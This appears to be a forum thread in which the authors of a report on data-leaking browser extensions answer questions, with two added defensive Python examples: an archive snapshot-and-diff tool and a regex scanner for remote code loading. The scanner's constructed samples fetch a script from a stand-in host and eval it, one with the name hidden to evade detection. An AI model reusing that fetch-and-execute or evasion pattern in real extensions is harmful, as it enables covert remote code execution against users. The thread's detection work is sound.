Thank you. We are very glad to see the discussion that the report has sparked, and also glad to see the feedback on it. It means a lot to us.
> 1- How large is your team, and how long did this research take? It is very thorough, and knowing such a detail might encourage others to participate in a joint effort in performing this kind of research.
The group is not very large and it took a few months of non-continuous work.
> 2- Is this kind of research your primary focus?
At the moment it is not very clear if we will do a follow-up on this topic or not, as explained in a different comment. At the moment yes, the group is new.
> 3- Are there other ways that financial support can be provided, other than through XRP or BTC?
No, at the moment. We would like to remain anonymous, at least for now.
My point was to have a community effort around it as well, if possible: people could, say, upload a suspicion, and other people could then confirm it?
I am curious, but wouldn't this effort be better if more people outside who are interested in investing their own resources for the safety of a better internet could help you out in such an endeavour? So essentially they can also help you out in such a task, essentially creating an open-source-ish committee/list which can decide it.
I do feel like if resources are in short supply, then actually doing such a thing would be even more beneficial, right? What are your thoughts on it?
(Tangent if you actually do this:
This might become a cat-and-mouse game if the person with the malicious extension, say, reads the GitHub repo and sees their extension in it before people can conclude it's malicious. But I am imagining a GitHub Action which can calculate the hash and download link and everything (essentially archiving a state of the extension), and then people can be freed from the game and everything as well. So this might help a lot in future if you actually implement it.)
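The archiving idea in the comment above, written out as an added example (this is not code from the report's authors or from anyone in this thread). It assumes the extension is available as a zip archive (the payload of a .crx is a zip), takes a snapshot of the archive hash, the download URL, the manifest's name, version and permissions, and a per-file hash, and diffs two snapshots so a later re-upload with new permissions or new files stands out. The sample extension is constructed in memory; nothing here is a real extension.

```python
"""Snapshot a browser-extension package so it can be archived and diffed later."""
import hashlib
import io
import json
import zipfile


def snapshot_extension(archive_bytes: bytes, download_url: str) -> dict:
    """Build a snapshot record from the raw bytes of an extension archive.

    Records the archive SHA-256, the download URL it came from, the manifest's
    name/version/permissions and a SHA-256 for every file inside the archive.
    """
    files = {}
    manifest = {}
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)
            files[info.filename] = hashlib.sha256(data).hexdigest()
            if info.filename == "manifest.json":
                manifest = json.loads(data)
    permissions = list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", []))
    return {
        "download_url": download_url,
        "archive_sha256": hashlib.sha256(archive_bytes).hexdigest(),
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "permissions": sorted(permissions),
        "files": files,
    }


def diff_snapshots(old: dict, new: dict) -> dict:
    """Report what changed between two snapshots of the same extension."""
    old_files, new_files = old["files"], new["files"]
    version_change = None
    if old["version"] != new["version"]:
        version_change = (old["version"], new["version"])
    return {
        "version": version_change,
        "permissions_added": sorted(set(new["permissions"]) - set(old["permissions"])),
        "permissions_removed": sorted(set(old["permissions"]) - set(new["permissions"])),
        "files_added": sorted(set(new_files) - set(old_files)),
        "files_removed": sorted(set(old_files) - set(new_files)),
        "files_modified": sorted(f for f in old_files.keys() & new_files.keys()
                                 if old_files[f] != new_files[f]),
    }


def build_sample_extension(version: str, permissions: list, extra_files: dict = None) -> bytes:
    """Construct a minimal extension archive in memory (a constructed sample, not a real extension)."""
    manifest = {"manifest_version": 3, "name": "Example Blocker", "version": version,
                "permissions": permissions}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest, sort_keys=True))
        zf.writestr("background.js", "chrome.runtime.onInstalled.addListener(() => {});\n")
        for name, content in (extra_files or {}).items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Two constructed releases of the same extension; the second asks for more permissions
    # and ships an extra file, which is the kind of change an archive makes visible.
    old = snapshot_extension(build_sample_extension("1.0.0", ["storage"]),
                             "https://example.invalid/ext-1.0.0.zip")
    new = snapshot_extension(build_sample_extension("1.1.0", ["storage", "tabs", "webRequest"],
                                                    {"collector.js": "// constructed sample file\n"}),
                             "https://example.invalid/ext-1.1.0.zip")
    print(json.dumps(diff_snapshots(old, new), indent=2))
```

A GitHub Action would run `snapshot_extension` on a schedule and commit the JSON record; since the record is just hashes and manifest fields, it can be published without redistributing the extension itself.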
It is a noble idea to have a community-driven effort in security research. We are sceptical that this would work. The same way security researchers will read this thread in the future, bad actors (e.g. Similarweb) can read it as well.
Any tool that is open-sourced or community-driven for extension scanning will, with enough time, be used by bad actors to evade the scans. That is also why we don't share the code for this research, as it would only speed up this process.
Oh, I understand. I don't have any expertise in such a field, but reading this, I can understand why an open-source approach might not work out, which is a little sad, being honest.
But I feel like then the (bottleneck?) [which I don't mean in a bad way] would be the team, where the attackers might still be infinitely more numerous and can exhaust your resources, as you mention.
Also, are there any other teams working on this? Thoughts on collaborating with anyone in the security field?
Maybe if a direct detailed discussion can't happen, then just as you released the list of these extensions, you could release extensions in future too as you detect them.
Do you feel as if an LLM-generated, vibe-coded extension (with some basic reading of the code just to get an idea and see if there are any bad issues) would be safer than a random extension in Firefox/Chrome in general? Given one is a black box (closed source) generated by a human and the other is open code generated by a black box.
15 years ago this type of business was probably in its very early stage. There is little that can be done about "selling" extensions. The Chrome Web Store should have tighter checks and scans to minimize this type of data exfiltration.
It's a moronic industry, waiting for the catastrophic data-theft disaster to happen before they do anything... Google is doing it, Apple did it, Zuck did it (the only hindrance Cambridge Analytica had to get over seemed to be the app developer agreement that devs had to click to promise they wouldn't do anything bad with the personal information of all those Facebook users...).
Which is all the more incredible, considering BlackBerry (the phone company that was big before the age of iPhones or YouTube) had a permission model that allowed users to deny 3rd-party apps access to contacts, calendar, etc., etc. The app would get a PermissionDeniedException if it couldn't access something. I remember the Google Maps app for BlackBerry, whose solution to that was "Please give this app all permissions or you can't use it"...
We beg to differ. Consider, for example, "BlockSite Block Websites and Stay Focused": why would you need to send browsing data to a remote server if your job is only to block selected domains?
If you look at the request made, then it seems to check the category of the site, for whatever reason. I don't know that extension, so I don't know if this is a legit use, sloppy use or harmful. I'm also not saying they found nothing at all. But looking through what they found, they seem to have not even thought much about whether those cases are legit and in the expected and necessary realm of actions the add-on is supposed to do, or if it's really harmful behaviour. I also don't see anything about how often the request was made. Was it on every URL change, or just once/occasionally?
This whole article is a bit too superficial for me.
Yes, obviously that is possible, but the least that one should do then is to look up what's really happening. These are browser add-ons; the source code is available. But instead they are looking from the outside and raising the alarm on something they don't understand. That's just poor behaviour and harmful in today's climate.
If you read their full paper, they do technical analysis confirming the findings in many cases. Many other researchers have done the same in the recent past.
The full paper also says that the unique URLs were later requested by crawlers, which confirms server-side collection.
What happens server-side is also confirmed by the palant.info article that shows a graphic provided by a major data broker that shows exactly how they misuse data collected by extensions under false pretenses.
It's far from speculation when there's both technical evidence collected by researchers and direct evidence provided by the bad actors themselves.
Without any doubt the research could continue on this. We had many opportunities to make the scan even wider, and almost certainly we would uncover more extensions. The number of leaking extensions should not be taken as definitive.
There are resource constraints. Those extensions try to actively detect if you are in developer mode. It took us a while to avoid such measures, and we are certain we missed many extensions due to, for example, the use of a Docker container. Ideally you want to use an environment as close to the real one as possible.
Without infrastructure this doesn't scale.
The same goes for the code analysis you have proposed. There are already tools that do that (see Secure Annex). Often the extensions download remote code that is responsible for the data exfiltration, or the code is obfuscated multiple times. Ideally you want to run the extension in a browser and inspect its code during execution.
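To illustrate the limit the reply describes, here is an added example (not the authors' tooling and not Secure Annex's): a static indicator scan over an extension's JavaScript that greps for code loaded or executed at runtime. The indicator list and both sample extensions are constructed for this example. The first sample loads a script from a remote host and the scan flags it; the second does the same thing with the `eval` name assembled from two strings, and the scan finds nothing, which is why the reply prefers inspecting the code while it runs in a browser.

```python
"""Static indicator scan of an extension's JavaScript files (a defender's first pass)."""
import re

# Heuristic patterns for code that executes or loads code at runtime (constructed list).
REMOTE_CODE_INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "new_function": re.compile(r"\bnew\s+Function\s*\("),
    "remote_script_src": re.compile(r"\.src\s*=\s*['\"]https?://"),
    "remote_import_scripts": re.compile(r"\bimportScripts\s*\(\s*['\"]https?://"),
    # A fetch() followed within 200 characters by eval/Function: fetched text being executed.
    "fetch_then_execute": re.compile(r"\bfetch\s*\([^)]*\)[\s\S]{0,200}?\b(eval|Function)\b"),
}


def scan_source(filename: str, source: str) -> list:
    """Return one finding per indicator hit, with the 1-based line of the match."""
    findings = []
    for label, pattern in REMOTE_CODE_INDICATORS.items():
        for match in pattern.finditer(source):
            line = source.count("\n", 0, match.start()) + 1
            findings.append({"file": filename, "indicator": label, "line": line})
    return findings


def scan_extension(files: dict) -> list:
    """Scan every .js file of an unpacked extension given as {path: source}."""
    findings = []
    for name, source in files.items():
        if name.endswith(".js"):
            findings.extend(scan_source(name, source))
    return findings


# Constructed sample 1: plainly fetches a remote script and executes it; the scan flags it.
SAMPLE_PLAIN = {
    "manifest.json": '{"name": "Example", "version": "1.0"}',
    "background.js": (
        "// constructed sample: fetch a script from a remote host and execute it\n"
        'fetch("https://update.example.invalid/payload.js")\n'
        "  .then(r => r.text())\n"
        "  .then(code => eval(code));\n"
    ),
}

# Constructed sample 2: same behaviour, but the function name is assembled at runtime,
# so none of the patterns above match. Only running the code reveals what it does.
SAMPLE_OBFUSCATED = {
    "manifest.json": '{"name": "Example", "version": "1.0"}',
    "background.js": (
        "// constructed sample: identical behaviour with the name hidden from a grep\n"
        'const n = "ev" + "al";\n'
        'fetch("https://update.example.invalid/payload.js")\n'
        "  .then(r => r.text())\n"
        "  .then(code => self[n](code));\n"
    ),
}


if __name__ == "__main__":
    print("plain:     ", scan_extension(SAMPLE_PLAIN))
    print("obfuscated:", scan_extension(SAMPLE_OBFUSCATED))
```

The scan is useful for triage of unpacked extensions you already have on disk, but a clean result is not evidence of absence; the second sample is about the simplest evasion possible, and the multiple layers of obfuscation the reply mentions make a static pass weaker still.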